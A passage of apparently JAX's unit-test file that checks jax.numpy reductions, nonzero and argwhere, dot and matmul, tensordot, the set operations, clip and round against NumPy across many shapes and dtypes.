for shape in rec.shapes for dtype in rec.dtypes
for axis in list(range(-len(shape), len(shape))) + [None]
for initial in [0, 1] for keepdims in [False, True])
for rec in JAX_REDUCER_INITIAL_RECORDS))
def testReducerInitial(self, np_op, jnp_op, rng_factory, shape, dtype, axis,
keepdims, initial, inexact):
rng = rng_factory(self.rng())
is_bf16_nan_test = dtype == jnp.bfloat16 and rng_factory.__name__ == 'rand_some_nan'
@jtu.ignore_warning(category=RuntimeWarning,
message="Degrees of freedom <= 0 for slice.*")
def np_fun(x):
x_cast = x if not is_bf16_nan_test else x.astype(np.float32)
res = np_op(x_cast, axis, keepdims=keepdims, initial=initial)
res = res if not is_bf16_nan_test else res.astype(jnp.bfloat16)
return res
np_fun = _promote_like_jnp(np_fun, inexact)
np_fun = jtu.ignore_warning(category=np.ComplexWarning)(np_fun)
jnp_fun = lambda x: jnp_op(x, axis, keepdims=keepdims, initial=initial)
jnp_fun = jtu.ignore_warning(category=jnp.ComplexWarning)(jnp_fun)
args_maker = lambda: [rng(shape, dtype)]
self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker)
self._CompileAndCheck(jnp_fun, args_maker)
@parameterized.named_parameters(itertools.chain.from_iterable(
jtu.cases_from_list(
{"testcase_name": "{}_inshape={}_axis={}_keepdims={}_initial={}_whereshape={}".format(
rec.test_name.capitalize(),
jtu.format_shape_dtype_string(shape, dtype), axis, keepdims, initial,
jtu.format_shape_dtype_string(whereshape, bool)),
"rng_factory": rec.rng_factory, "shape": shape, "dtype": dtype,
"np_op": getattr(np, rec.name), "jnp_op": getattr(jnp, rec.name), "whereshape": whereshape,
"initial": initial, "axis": axis, "keepdims": keepdims, "inexact": rec.inexact}
for shape in rec.shapes for dtype in rec.dtypes
for whereshape in _compatible_shapes(shape)
for axis in list(range(-len(shape), len(shape))) + [None]
for initial in [0, 1] for keepdims in [False, True])
for rec in JAX_REDUCER_INITIAL_RECORDS))
def testReducerWhere(self, np_op, jnp_op, rng_factory, shape, dtype, axis,
keepdims, initial, inexact, whereshape):
if (shape in [()] + scalar_shapes and
dtype in [jnp.int16, jnp.uint16] and
jnp_op in [jnp.min, jnp.max]):
self.skipTest("Known XLA failure; see https://github.com/google/jax/issues/4971.")
rng = rng_factory(self.rng())
is_bf16_nan_test = dtype == jnp.bfloat16 and rng_factory.__name__ == 'rand_some_nan'
# Do not pass where via args_maker as that is incompatible with _promote_like_jnp.
where = jtu.rand_bool(self.rng())(whereshape, np.bool_)
@jtu.ignore_warning(category=RuntimeWarning,
message="Degrees of freedom <= 0 for slice.*")
def np_fun(x):
x_cast = x if not is_bf16_nan_test else x.astype(np.float32)
res = np_op(x_cast, axis, keepdims=keepdims, initial=initial, where=where)
res = res if not is_bf16_nan_test else res.astype(jnp.bfloat16)
return res
np_fun = _promote_like_jnp(np_fun, inexact)
np_fun = jtu.ignore_warning(category=np.ComplexWarning)(np_fun)
jnp_fun = lambda x: jnp_op(x, axis, keepdims=keepdims, initial=initial, where=where)
jnp_fun = jtu.ignore_warning(category=jnp.ComplexWarning)(jnp_fun)
args_maker = lambda: [rng(shape, dtype)]
self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker)
self._CompileAndCheck(jnp_fun, args_maker)
@unittest.skipIf(numpy_version < (1, 20), "where parameter not supported in older numpy")
@parameterized.named_parameters(itertools.chain.from_iterable(
jtu.cases_from_list(
{"testcase_name": "{}_inshape={}_axis={}_keepdims={}_whereshape={}".format(
rec.test_name.capitalize(),
jtu.format_shape_dtype_string(shape, dtype), axis, keepdims,
jtu.format_shape_dtype_string(whereshape, bool)),
"rng_factory": rec.rng_factory, "shape": shape, "dtype": dtype,
"np_op": getattr(np, rec.name), "jnp_op": getattr(jnp, rec.name), "whereshape": whereshape,
"axis": axis, "keepdims": keepdims, "inexact": rec.inexact}
for shape in rec.shapes for dtype in rec.dtypes
for whereshape in _compatible_shapes(shape)
for axis in list(range(-len(shape), len(shape))) + [None]
for keepdims in [False, True])
for rec in JAX_REDUCER_WHERE_NO_INITIAL_RECORDS))
def testReducerWhereNoInitial(self, np_op, jnp_op, rng_factory, shape, dtype, axis,
keepdims, inexact, whereshape):
rng = rng_factory(self.rng())
is_bf16_nan_test = dtype == jnp.bfloat16
# Do not pass where via args_maker as that is incompatible with _promote_like_jnp.
where = jtu.rand_bool(self.rng())(whereshape, np.bool_)
@jtu.ignore_warning(category=RuntimeWarning,
message="Degrees of freedom <= 0 for slice.*")
@jtu.ignore_warning(category=RuntimeWarning,
message="Mean of empty slice.*")
@jtu.ignore_warning(category=RuntimeWarning,
message="invalid value encountered in true_divide*")
def np_fun(x):
x_cast = x if not is_bf16_nan_test else x.astype(np.float32)
res = np_op(x_cast, axis, keepdims=keepdims, where=where)
res = res if not is_bf16_nan_test else res.astype(jnp.bfloat16)
return res
np_fun = _promote_like_jnp(np_fun, inexact)
np_fun = jtu.ignore_warning(category=np.ComplexWarning)(np_fun)
jnp_fun = lambda x: jnp_op(x, axis, keepdims=keepdims, where=where)
jnp_fun = jtu.ignore_warning(category=jnp.ComplexWarning)(jnp_fun)
args_maker = lambda: [rng(shape, dtype)]
if numpy_version >= (1, 20, 2) or np_op.__name__ in ("all", "any"):
self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker)
self._CompileAndCheck(jnp_fun, args_maker)
@parameterized.named_parameters(jtu.cases_from_list(
{"testcase_name": "_shape={}_axis={}".format(
jtu.format_shape_dtype_string(shape, dtype), axis),
"shape": shape, "dtype": dtype, "axis": axis}
for shape in all_shapes for dtype in all_dtypes
for axis in list(range(-len(shape), len(shape))) + [None]))
def testCountNonzero(self, shape, dtype, axis):
rng = jtu.rand_some_zero(self.rng())
np_fun = lambda x: np.count_nonzero(x, axis)
jnp_fun = lambda x: jnp.count_nonzero(x, axis)
args_maker = lambda: [rng(shape, dtype)]
self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker, check_dtypes=False)
self._CompileAndCheck(jnp_fun, args_maker)
@parameterized.named_parameters(jtu.cases_from_list(
{"testcase_name": "_shape={}".format(
jtu.format_shape_dtype_string(shape, dtype)),
"shape": shape, "dtype": dtype}
for shape in all_shapes for dtype in all_dtypes))
def testNonzero(self, shape, dtype):
rng = jtu.rand_some_zero(self.rng())
np_fun = lambda x: np.nonzero(x)
np_fun = jtu.ignore_warning(
category=DeprecationWarning,
message="Calling nonzero on 0d arrays.*")(np_fun)
jnp_fun = lambda x: jnp.nonzero(x)
args_maker = lambda: [rng(shape, dtype)]
self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker, check_dtypes=False)
@parameterized.named_parameters(jtu.cases_from_list(
{"testcase_name": "_shape={}_size={}_fill_value={}".format(
jtu.format_shape_dtype_string(shape, dtype), size, fill_value),
"shape": shape, "dtype": dtype, "size": size, "fill_value": fill_value}
for shape in nonempty_array_shapes
for dtype in all_dtypes
for fill_value in [None, -1]
for size in [1, 5, 10]))
def testNonzeroSize(self, shape, dtype, size, fill_value):
rng = jtu.rand_some_zero(self.rng())
args_maker = lambda: [rng(shape, dtype)]
@jtu.ignore_warning(category=DeprecationWarning, message="Calling nonzero on 0d arrays.*")
def np_fun(x):
result = np.nonzero(x)
if size <= len(result[0]):
return tuple(arg[:size] for arg in result)
else:
return tuple(np.concatenate([arg, np.full(size - len(arg), fill_value or 0, arg.dtype)])
for arg in result)
jnp_fun = lambda x: jnp.nonzero(x, size=size, fill_value=fill_value)
self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker, check_dtypes=False)
self._CompileAndCheck(jnp_fun, args_maker)
@parameterized.named_parameters(jtu.cases_from_list(
{"testcase_name": "_shape={}".format(
jtu.format_shape_dtype_string(shape, dtype)),
"shape": shape, "dtype": dtype}
for shape in all_shapes for dtype in all_dtypes))
def testFlatNonzero(self, shape, dtype):
rng = jtu.rand_some_zero(self.rng())
np_fun = jtu.ignore_warning(
category=DeprecationWarning,
message="Calling nonzero on 0d arrays.*")(np.flatnonzero)
jnp_fun = jnp.flatnonzero
args_maker = lambda: [rng(shape, dtype)]
self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker, check_dtypes=False)
# JIT compilation requires specifying the size statically:
jnp_fun = lambda x: jnp.flatnonzero(x, size=np.size(x) // 2)
self._CompileAndCheck(jnp_fun, args_maker)
@parameterized.named_parameters(jtu.cases_from_list(
{"testcase_name": "_shape={}".format(
jtu.format_shape_dtype_string(shape, dtype)),
"shape": shape, "dtype": dtype}
for shape in all_shapes for dtype in all_dtypes))
def testArgWhere(self, shape, dtype):
rng = jtu.rand_some_zero(self.rng())
np_fun = jtu.ignore_warning(
category=DeprecationWarning,
message="Calling nonzero on 0d arrays.*")(np.argwhere)
jnp_fun = jnp.argwhere
args_maker = lambda: [rng(shape, dtype)]
if shape in (scalar_shapes + [()]) and numpy_version < (1, 18):
self.skipTest("np.argwhere() result for scalar input changed in numpy 1.18.")
self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker, check_dtypes=False)
# JIT compilation requires specifying a size statically. Full test of this
# behavior is in testNonzeroSize().
jnp_fun = lambda x: jnp.argwhere(x, size=np.size(x) // 2)
self._CompileAndCheck(jnp_fun, args_maker)
@parameterized.named_parameters(jtu.cases_from_list(
{"testcase_name": "{}_inshape={}_axis={}".format(
rec.test_name.capitalize(),
jtu.format_shape_dtype_string(shape, dtype), axis),
"rng_factory": rec.rng_factory, "shape": shape, "dtype": dtype,
"np_op": getattr(np, rec.name), "jnp_op": getattr(jnp, rec.name),
"axis": axis}
for rec in JAX_ARGMINMAX_RECORDS
for shape, dtype in _shape_and_dtypes(rec.shapes, rec.dtypes)
for axis in range(-len(shape), len(shape))))
def testArgMinMax(self, np_op, jnp_op, rng_factory, shape, dtype, axis):
rng = rng_factory(self.rng())
if dtype == np.complex128 and jtu.device_under_test() == "gpu":
raise unittest.SkipTest("complex128 reductions not supported on GPU")
if "nan" in np_op.__name__ and dtype == jnp.bfloat16:
raise unittest.SkipTest("NumPy doesn't correctly handle bfloat16 arrays")
def np_fun(array_to_reduce):
return np_op(array_to_reduce, axis).astype(jnp.int_)
def jnp_fun(array_to_reduce):
return jnp_op(array_to_reduce, axis)
args_maker = lambda: [rng(shape, dtype)]
try:
self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker)
except ValueError as e:
if str(e) == "All-NaN slice encountered":
self.skipTest("JAX doesn't support checking for all-NaN slices")
else:
raise
self._CompileAndCheck(jnp_fun, args_maker)
@parameterized.named_parameters(jtu.cases_from_list(
{"testcase_name": rec.test_name.capitalize(), "name": rec.name,
"np_op": getattr(np, rec.name), "jnp_op": getattr(jnp, rec.name)}
for rec in JAX_ARGMINMAX_RECORDS))
def testArgMinMaxEmpty(self, name, np_op, jnp_op):
name = name[3:] if name.startswith("nan") else name
msg = "attempt to get {} of an empty sequence".format(name)
with self.assertRaises(ValueError, msg=msg):
jnp_op(np.array([]))
with self.assertRaises(ValueError, msg=msg):
jnp_op(np.zeros((2, 0)), axis=1)
np_fun = partial(np_op, axis=0)
jnp_fun = partial(jnp_op, axis=0)
args_maker = lambda: [np.zeros((2, 0))]
self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker)
self._CompileAndCheck(jnp_fun, args_maker)
@parameterized.named_parameters(jtu.cases_from_list(
{"testcase_name": "_{}_{}_{}".format(
jtu.format_shape_dtype_string(lhs_shape, lhs_dtype),
jtu.format_shape_dtype_string(rhs_shape, rhs_dtype),
axes),
"lhs_shape": lhs_shape, "lhs_dtype": lhs_dtype,
"rhs_shape": rhs_shape, "rhs_dtype": rhs_dtype,
"axes": axes}
for lhs_shape, rhs_shape, axes in [
[(2,), (2,), (-1, -1, -1, None)], # scalar output
[(2, 4), (2, 4), (-1, -1, -1, 0)], # 2D vectors
[(3, 4), (3, 4), (-1, -1, -1, 0)], # 3D vectors
[(3, 4), (3, 6, 5, 4), (-1, -1, -1, 0)], # broadcasting
[(4, 3), (3, 6, 5, 4), (1, 0, -1, None)], # different axes
[(6, 1, 3), (5, 3), (-1, -1, -1, None)], # more broadcasting
[(6, 1, 2), (5, 3), (-1, -1, -1, None)], # mixed 2D and 3D vectors
[(10, 5, 2, 8), (1, 5, 1, 3), (-2, -1, -3, None)], # axes/broadcasting
[(4, 5, 2), (4, 5, 2), (-1, -1, 0, None)], # axisc should do nothing
[(4, 5, 2), (4, 5, 2), (-1, -1, -1, None)] # same as before
]
for lhs_dtype, rhs_dtype in itertools.combinations_with_replacement(number_dtypes, 2)))
@jax.numpy_rank_promotion('allow') # This test explicitly exercises implicit rank promotion.
def testCross(self, lhs_shape, lhs_dtype, rhs_shape, rhs_dtype, axes):
rng = jtu.rand_default(self.rng())
args_maker = lambda: [rng(lhs_shape, lhs_dtype), rng(rhs_shape, rhs_dtype)]
axisa, axisb, axisc, axis = axes
jnp_fun = lambda a, b: jnp.cross(a, b, axisa, axisb, axisc, axis)
def np_fun(a, b):
a = a.astype(np.float32) if lhs_dtype == jnp.bfloat16 else a
b = b.astype(np.float32) if rhs_dtype == jnp.bfloat16 else b
out = np.cross(a, b, axisa, axisb, axisc, axis)
return out.astype(jnp.promote_types(lhs_dtype, rhs_dtype))
tol_spec = {dtypes.bfloat16: 3e-1, np.float16: 0.15}
tol = max(jtu.tolerance(lhs_dtype, tol_spec),
jtu.tolerance(rhs_dtype, tol_spec))
self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker,
tol=tol)
self._CompileAndCheck(jnp_fun, args_maker, atol=tol,
rtol=tol)
@parameterized.named_parameters(jtu.cases_from_list(
{"testcase_name": "_{}_{}_{}".format(
name,
jtu.format_shape_dtype_string(lhs_shape, lhs_dtype),
jtu.format_shape_dtype_string(rhs_shape, rhs_dtype)),
"lhs_shape": lhs_shape, "lhs_dtype": lhs_dtype,
"rhs_shape": rhs_shape, "rhs_dtype": rhs_dtype}
for name, lhs_shape, rhs_shape in [
("matrix-scalar", (3, 3), ()),
("scalar-matrix", (), (3, 3)),
("matrix-vector", (4, 5), (5,)),
("vector-matrix", (6,), (6, 4)),
("matrix-matrix", (3, 4), (4, 5)),
("tensor-vector", (4, 3, 2), (2,)),
("vector-tensor", (2,), (3, 2, 4)),
("tensor-matrix", (4, 3, 2), (2, 5)),
("matrix-tensor", (5, 2), (3, 2, 4)),
("tensor-tensor", (2, 3, 4), (5, 4, 1))]
for lhs_dtype, rhs_dtype in itertools.combinations_with_replacement(number_dtypes, 2)))
def testDot(self, lhs_shape, lhs_dtype, rhs_shape, rhs_dtype):
rng = jtu.rand_default(self.rng())
args_maker = lambda: [rng(lhs_shape, lhs_dtype), rng(rhs_shape, rhs_dtype)]
tol = {np.float16: 1e-2, np.float32: 1e-5, np.float64: 1e-14,
np.complex128: 1e-14}
if jtu.device_under_test() == "tpu":
tol[np.float16] = tol[np.float32] = tol[np.complex64] = 2e-1
def np_dot(x, y):
x = x.astype(np.float32) if lhs_dtype == jnp.bfloat16 else x
y = y.astype(np.float32) if rhs_dtype == jnp.bfloat16 else y
return np.dot(x, y).astype(jnp.promote_types(lhs_dtype, rhs_dtype))
self._CheckAgainstNumpy(np_dot, jnp.dot, args_maker,
tol=tol)
self._CompileAndCheck(jnp.dot, args_maker, atol=tol,
rtol=tol)
@parameterized.named_parameters(jtu.cases_from_list(
{"testcase_name": "_{}_{}_{}".format(
name,
jtu.format_shape_dtype_string(lhs_shape, lhs_dtype),
jtu.format_shape_dtype_string(rhs_shape, rhs_dtype)),
"lhs_shape": lhs_shape, "lhs_dtype": lhs_dtype,
"rhs_shape": rhs_shape, "rhs_dtype": rhs_dtype}
for name, lhs_shape, rhs_shape in [
("vector-vector", (3,), (3,)),
("matrix-vector", (3, 3), (3,)),
("vector-matrix", (3,), (3, 3)),
("matrix-matrix", (3, 3), (3, 3)),
("vector-tensor", (3,), (5, 3, 2)),
("tensor-vector", (5, 3, 2), (2,)),
("matrix-tensor", (5, 2), (3, 2, 4)),
("tensor-matrix", (5, 2, 3), (3, 2)),
("tensor-tensor", (5, 3, 4), (5, 4, 1)),
("tensor-tensor-broadcast", (3, 1, 3, 4), (5, 4, 1))]
for lhs_dtype, rhs_dtype in itertools.combinations_with_replacement(number_dtypes, 2)))
def testMatmul(self, lhs_shape, lhs_dtype, rhs_shape, rhs_dtype):
rng = jtu.rand_default(self.rng())
def np_fun(x, y):
dtype = jnp.promote_types(lhs_dtype, rhs_dtype)
return np.matmul(x, y).astype(dtype)
args_maker = lambda: [rng(lhs_shape, lhs_dtype), rng(rhs_shape, rhs_dtype)]
tol = {np.float16: 1e-2, np.float32: 2e-2, np.float64: 1e-12,
np.complex128: 1e-12}
if jtu.device_under_test() == "tpu":
tol[np.float16] = tol[np.float32] = tol[np.complex64] = 4e-2
self._CheckAgainstNumpy(np_fun, jnp.matmul, args_maker, tol=tol)
self._CompileAndCheck(jnp.matmul, args_maker, atol=tol, rtol=tol)
@parameterized.named_parameters(jtu.cases_from_list(
{"testcase_name": "_{}_{}_{}".format(
jtu.format_shape_dtype_string(lhs_shape, lhs_dtype),
jtu.format_shape_dtype_string(rhs_shape, rhs_dtype),
axes),
"lhs_shape": lhs_shape, "lhs_dtype": lhs_dtype,
"rhs_shape": rhs_shape, "rhs_dtype": rhs_dtype,
"axes": axes}
for lhs_shape, rhs_shape, axes in [
[(3,), (), 0],
[(2, 3, 4), (5, 6, 7), 0], # from issue #740
[(2, 3, 4), (3, 4, 5, 6), 2],
[(2, 3, 4), (5, 4, 3, 6), [1, 2]],
[(2, 3, 4), (5, 4, 3, 6), [[1, 2], [2, 1]]],
[(1, 2, 3, 4), (4, 5, 3, 6), [[2, 3], [2, 0]]],
]
for lhs_dtype, rhs_dtype in itertools.combinations_with_replacement(number_dtypes, 2)))
def testTensordot(self, lhs_shape, lhs_dtype, rhs_shape, rhs_dtype, axes):
rng = jtu.rand_default(self.rng())
args_maker = lambda: [rng(lhs_shape, lhs_dtype), rng(rhs_shape, rhs_dtype)]
jnp_fun = lambda a, b: jnp.tensordot(a, b, axes)
def np_fun(a, b):
a = a if lhs_dtype != jnp.bfloat16 else a.astype(np.float32)
b = b if rhs_dtype != jnp.bfloat16 else b.astype(np.float32)
dtype = jnp.promote_types(lhs_dtype, rhs_dtype)
return np.tensordot(a, b, axes).astype(dtype)
tol = {np.float16: 1e-1, np.float32: 1e-3, np.float64: 1e-12,
np.complex64: 1e-3, np.complex128: 1e-12}
if jtu.device_under_test() == "tpu":
tol[np.float16] = tol[np.float32] = tol[np.complex64] = 2e-1
self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker,
tol=tol)
self._CompileAndCheck(jnp_fun, args_maker)
def testTensordotErrors(self):
a = np.random.random((3, 2, 2))
b = np.random.random((2,))
self.assertRaisesRegex(
TypeError, "Number of tensordot axes.*exceeds input ranks.*",
lambda: jnp.tensordot(a, b, axes=2))
self.assertRaisesRegex(
TypeError, "tensordot requires axes lists to have equal length.*",
lambda: jnp.tensordot(a, b, axes=([0], [0, 1])))
self.assertRaisesRegex(
TypeError, "tensordot requires both axes lists to be either ints, tuples or lists.*",
lambda: jnp.tensordot(a, b, axes=('bad', 'axes')))
self.assertRaisesRegex(
TypeError, "tensordot axes argument must be an int, a pair of ints, or a pair of lists.*",
lambda: jnp.tensordot(a, b, axes='badaxes'))
@parameterized.named_parameters(jtu.cases_from_list(
{"testcase_name": "_{}_{}_invert={}".format(
jtu.format_shape_dtype_string(element_shape, dtype),
jtu.format_shape_dtype_string(test_shape, dtype), invert),
"element_shape": element_shape, "test_shape": test_shape,
"dtype": dtype, "invert": invert}
for element_shape in all_shapes
for test_shape in all_shapes
for dtype in default_dtypes
for invert in [True, False]))
def testIsin(self, element_shape, test_shape, dtype, invert):
rng = jtu.rand_default(self.rng())
args_maker = lambda: [rng(element_shape, dtype), rng(test_shape, dtype)]
jnp_fun = lambda e, t: jnp.isin(e, t, invert=invert)
np_fun = lambda e, t: np.isin(e, t, invert=invert)
self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker)
self._CompileAndCheck(jnp_fun, args_maker)
@parameterized.named_parameters(jtu.cases_from_list(
{"testcase_name": "_{}_{}_invert={}".format(
jtu.format_shape_dtype_string(element_shape, dtype),
jtu.format_shape_dtype_string(test_shape, dtype), invert),
"element_shape": element_shape, "test_shape": test_shape,
"dtype": dtype, "invert": invert}
for element_shape in all_shapes
for test_shape in all_shapes
for dtype in default_dtypes
for invert in [True, False]))
def testIn1d(self, element_shape, test_shape, dtype, invert):
rng = jtu.rand_default(self.rng())
args_maker = lambda: [rng(element_shape, dtype), rng(test_shape, dtype)]
jnp_fun = lambda e, t: jnp.in1d(e, t, invert=invert)
np_fun = lambda e, t: np.in1d(e, t, invert=invert)
self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker)
self._CompileAndCheck(jnp_fun, args_maker)
@parameterized.named_parameters(jtu.cases_from_list(
{"testcase_name": "_{}_{}".format(
jtu.format_shape_dtype_string(shape1, dtype1),
jtu.format_shape_dtype_string(shape2, dtype2)),
"shape1": shape1, "shape2": shape2, "dtype1": dtype1, "dtype2": dtype2}
for dtype1 in [s for s in default_dtypes if s != jnp.bfloat16]
for dtype2 in [s for s in default_dtypes if s != jnp.bfloat16]
for shape1 in all_shapes
for shape2 in all_shapes))
def testSetdiff1d(self, shape1, shape2, dtype1, dtype2):
rng = jtu.rand_default(self.rng())
args_maker = lambda: [rng(shape1, dtype1), rng(shape2, dtype2)]
self._CheckAgainstNumpy(np.setdiff1d, jnp.setdiff1d, args_maker)
@parameterized.named_parameters(jtu.cases_from_list(
{"testcase_name": "_{}_{}".format(
jtu.format_shape_dtype_string(shape1, dtype1),
jtu.format_shape_dtype_string(shape2, dtype2)),
"shape1": shape1, "shape2": shape2, "dtype1": dtype1, "dtype2": dtype2}
for dtype1 in [s for s in default_dtypes if s != jnp.bfloat16]
for dtype2 in [s for s in default_dtypes if s != jnp.bfloat16]
for shape1 in nonempty_nonscalar_array_shapes
for shape2 in nonempty_nonscalar_array_shapes))
def testUnion1d(self, shape1, shape2, dtype1, dtype2):
rng = jtu.rand_default(self.rng())
args_maker = lambda: [rng(shape1, dtype1), rng(shape2, dtype2)]
def np_fun(arg1, arg2):
dtype = jnp.promote_types(arg1.dtype, arg2.dtype)
return np.union1d(arg1, arg2).astype(dtype)
self._CheckAgainstNumpy(np_fun, jnp.union1d, args_maker)
@parameterized.named_parameters(jtu.cases_from_list(
{"testcase_name": "_{}_{}_size={}".format(
jtu.format_shape_dtype_string(shape1, dtype1),
jtu.format_shape_dtype_string(shape2, dtype2), size),
"shape1": shape1, "shape2": shape2, "dtype1": dtype1, "dtype2": dtype2, "size": size}
for dtype1 in [s for s in default_dtypes if s != jnp.bfloat16]
for dtype2 in [s for s in default_dtypes if s != jnp.bfloat16]
for shape1 in nonempty_nonscalar_array_shapes
for shape2 in nonempty_nonscalar_array_shapes
for size in [1, 5, 10]))
def testUnion1dSize(self, shape1, shape2, dtype1, dtype2, size):
rng = jtu.rand_default(self.rng())
args_maker = lambda: [rng(shape1, dtype1), rng(shape2, dtype2)]
def np_fun(arg1, arg2):
dtype = jnp.promote_types(arg1.dtype, arg2.dtype)
result = np.union1d(arg1, arg2).astype(dtype)
if size <= len(result):
return result[:size]
else:
return np.concatenate([result, np.full(size - len(result), result[0], result.dtype)])
def jnp_fun(arg1, arg2):
return jnp.union1d(arg1, arg2, size=size)
self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker)
self._CompileAndCheck(jnp_fun, args_maker)
@parameterized.named_parameters(jtu.cases_from_list(
{"testcase_name": "_{}_{}_assume_unique={}".format(
jtu.format_shape_dtype_string(shape1, dtype1),
jtu.format_shape_dtype_string(shape2, dtype2),
assume_unique),
"shape1": shape1, "dtype1": dtype1, "shape2": shape2, "dtype2": dtype2,
"assume_unique": assume_unique}
for dtype1 in [s for s in default_dtypes if s != jnp.bfloat16]
for dtype2 in [s for s in default_dtypes if s != jnp.bfloat16]
for shape1 in all_shapes
for shape2 in all_shapes
for assume_unique in [False, True]))
def testSetxor1d(self, shape1, dtype1, shape2, dtype2, assume_unique):
rng = jtu.rand_default(self.rng())
args_maker = lambda: [rng(shape1, dtype1), rng(shape2, dtype2)]
jnp_fun = lambda ar1, ar2: jnp.setxor1d(ar1, ar2, assume_unique=assume_unique)
def np_fun(ar1, ar2):
if assume_unique:
# pre-flatten the arrays to match with jax implementation
ar1 = np.ravel(ar1)
ar2 = np.ravel(ar2)
return np.setxor1d(ar1, ar2, assume_unique)
self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker, check_dtypes=False)
@parameterized.named_parameters(jtu.cases_from_list(
{"testcase_name": "_{}_{}_assume_unique={}_return_indices={}".format(
jtu.format_shape_dtype_string(shape1, dtype1),
jtu.format_shape_dtype_string(shape2, dtype2),
assume_unique,
return_indices),
"shape1": shape1, "dtype1": dtype1, "shape2": shape2, "dtype2": dtype2,
"assume_unique": assume_unique, "return_indices": return_indices}
for dtype1 in [s for s in default_dtypes if s != jnp.bfloat16]
for dtype2 in [s for s in default_dtypes if s != jnp.bfloat16]
for shape1 in all_shapes
for shape2 in all_shapes
for assume_unique in [False, True]
for return_indices in [False, True]))
def testIntersect1d(self, shape1, dtype1, shape2, dtype2, assume_unique, return_indices):
rng = jtu.rand_default(self.rng())
args_maker = lambda: [rng(shape1, dtype1), rng(shape2, dtype2)]
jnp_fun = lambda ar1, ar2: jnp.intersect1d(ar1, ar2, assume_unique=assume_unique, return_indices=return_indices)
np_fun = lambda ar1, ar2: np.intersect1d(ar1, ar2, assume_unique=assume_unique, return_indices=return_indices)
self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker, check_dtypes=False)
@parameterized.named_parameters(jtu.cases_from_list(
{"testcase_name": "_{}_{}".format(
jtu.format_shape_dtype_string(lhs_shape, lhs_dtype),
jtu.format_shape_dtype_string(rhs_shape, rhs_dtype)),
"lhs_shape": lhs_shape, "lhs_dtype": lhs_dtype,
"rhs_shape": rhs_shape, "rhs_dtype": rhs_dtype}
# TODO(phawkins): support integer dtypes too.
for lhs_shape, lhs_dtype in _shape_and_dtypes(all_shapes, inexact_dtypes)
for rhs_shape, rhs_dtype in _shape_and_dtypes(all_shapes, inexact_dtypes)
if len(jtu._dims_of_shape(lhs_shape)) == 0
or len(jtu._dims_of_shape(rhs_shape)) == 0
or lhs_shape[-1] == rhs_shape[-1]))
def testInner(self, lhs_shape, lhs_dtype, rhs_shape, rhs_dtype):
rng = jtu.rand_default(self.rng())
args_maker = lambda: [rng(lhs_shape, lhs_dtype), rng(rhs_shape, rhs_dtype)]
def np_fun(lhs, rhs):
lhs = lhs if lhs_dtype != jnp.bfloat16 else lhs.astype(np.float32)
rhs = rhs if rhs_dtype != jnp.bfloat16 else rhs.astype(np.float32)
dtype = jnp.promote_types(lhs_dtype, rhs_dtype)
return np.inner(lhs, rhs).astype(dtype)
jnp_fun = lambda lhs, rhs: jnp.inner(lhs, rhs)
tol_spec = {np.float16: 1e-2, np.float32: 1e-5, np.float64: 1e-13,
np.complex64: 1e-5}
if jtu.device_under_test() == "tpu":
tol_spec[np.float32] = tol_spec[np.complex64] = 2e-1
tol = max(jtu.tolerance(lhs_dtype, tol_spec),
jtu.tolerance(rhs_dtype, tol_spec))
# TODO(phawkins): there are float32/float64 disagreements for some inputs.
self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker, check_dtypes=False,
tol=tol)
self._CompileAndCheck(jnp_fun, args_maker, check_dtypes=False, atol=tol,
rtol=tol)
@parameterized.named_parameters(jtu.cases_from_list(
{"testcase_name": "_{}_amin={}_amax={}".format(
jtu.format_shape_dtype_string(shape, dtype), a_min, a_max),
"shape": shape, "dtype": dtype, "a_min": a_min, "a_max": a_max}
for shape in all_shapes for dtype in number_dtypes
for a_min, a_max in [(-1, None), (None, 1), (-0.9, 1),
(-np.ones(1), None),
(None, np.ones(1)),
(np.full(1, -0.9), np.ones(1))]))
@jax.numpy_rank_promotion('allow') # This test explicitly exercises implicit rank promotion.
def testClipStaticBounds(self, shape, dtype, a_min, a_max):
rng = jtu.rand_default(self.rng())
np_fun = lambda x: np.clip(x, a_min=a_min, a_max=a_max)
jnp_fun = lambda x: jnp.clip(x, a_min=a_min, a_max=a_max)
args_maker = lambda: [rng(shape, dtype)]
self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker, check_dtypes=False)
self._CompileAndCheck(jnp_fun, args_maker)
def testClipError(self):
with self.assertRaisesRegex(ValueError, "At most one of a_min and a_max.*"):
jnp.clip(jnp.zeros((3,)))
@parameterized.named_parameters(jtu.cases_from_list(
{"testcase_name": "_{}_decimals={}".format(
jtu.format_shape_dtype_string(shape, dtype), decimals),
"shape": shape, "dtype": dtype, "decimals": decimals}
for shape, dtype in _shape_and_dtypes(all_shapes, number_dtypes)
for decimals in [0, 1, -2]))
def testRoundStaticDecimals(self, shape, dtype, decimals):
rng = jtu.rand_default(self.rng())
if jnp.issubdtype(dtype, np.integer) and decimals < 0:
self.skipTest("Integer rounding with decimals < 0 not implemented")
np_fun = lambda x: np.round(x, decimals=decimals)
jnp_fun = lambda x: jnp.round(x, decimals=decimals)
args_maker = lambda: [rng(shape, dtype)]
tol = {jnp.bfloat16: 5e-2, np.float16: 1e-2}
check_dtypes = shape is not jtu.PYTHON_SCALAR_SHAPE
self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker,
check_dtypes=check_dtypes, tol=tol)
self._CompileAndCheck(jnp_fun, args_maker, check_dtypes=check_dtypes,
atol=tol, rtol=tol)
def testOperatorRound(self):
self.assertAllClose(round(np.float32(7.532), 1),
round(jnp.float32(7.5), 1))
self.assertAllClose(round(np.float32(1.234), 2),
round(jnp.float32(1.234), 2))
self.assertAllClose(round(np.float32(1.234)),
round(jnp.float32(1.234)), check_dtypes=False)
